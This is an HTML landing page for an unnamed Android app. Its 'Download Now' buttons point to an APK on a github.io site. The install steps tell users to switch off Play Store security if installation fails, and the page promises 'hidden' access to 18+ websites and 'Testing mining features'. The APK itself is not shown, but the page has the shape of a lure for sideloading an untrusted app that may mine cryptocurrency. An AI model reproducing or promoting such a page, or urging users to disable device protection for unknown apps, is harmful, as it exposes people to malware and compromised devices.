
<!DOCTYPE html>
<html>
<head>
	<title>My App</title>
	<link rel="stylesheet" type="text/css" href="style.css">
	<style>
	  body {
	font-family: Arial, sans-serif;
	background-color: #f0f0f0;
}

h1 {
	text-align: center;
}

p {
	text-align: center;
	margin-top: 50px;
	font-size: 1.2em;
}

.feature {
	display: flex;
	flex-direction: column;
	align-items: center;
	margin: 50px 0;
}

.feature img {
	max-width: 100%;
}

.feature h2 {
	margin-top: 20px;
	font-size: 1.5em;
}

.feature p {
	text-align: center;
	margin-top: 20px;
	max-width: 500px;
}

button {
	background-color: #4CAF50;
	color: white;
	padding: 10px 20px;
	border: none;
	border-radius: 5px;
	font-size: 1.2em;
	cursor: pointer;
	margin-top: 50px;
}

button:hover {
	background-color: #3e8e41;
}

	</style>
</head>
<body>
	<h1>My App</h1>
		<center>
		  <a href="https://mode-00.github.io/apk.github.io/app.apk" download><button>Download Now</button></a>
		</center>
	<p>Welcome to my app! Check out some of the cool features below.</p>
		<div class="feature">
		  <h2>Install process</h2>
		  <video style="width: 700px; height: 100%;" src="apk.mp4">
		    
		    
		  </video>
		  <p>1 download apk.
		  2 click apk for installation.
		  3 if not installing go playstore apk and off playground/security
		  
		  
		  </p>
		</div>
	<div class="feature">
		<img src="https://p.kindpng.com/picc/s/709-7092111_internet-and-social-networks-hd-png-download.png" alt="Feature 1">
		<h2>Feature 1</h2>
		<p>You can access all social media video.</p>
	</div>
	<div class="feature">
		<img src="https://www.pngitem.com/pimgs/m/110-1100190_file-under18-under-18-not-allowed-hd-png.png" alt="Feature 2">
		<h2>Feature 2</h2>
		<p>with hidden features you can access all 18+ website.</p>
	</div>
	<div class="feature">
		<img src="https://img.lovepik.com/element/40108/8916.png_300.png" alt="Feature 3">
		<h2>Feature 3</h2>
		<p> With Testing mining features</p>
	</div>
	<center>
	<a href="https://mode-00.github.io/apk.github.io/app.apk" download><button>Download Now</button></a>
	</center>
</body>
</html>
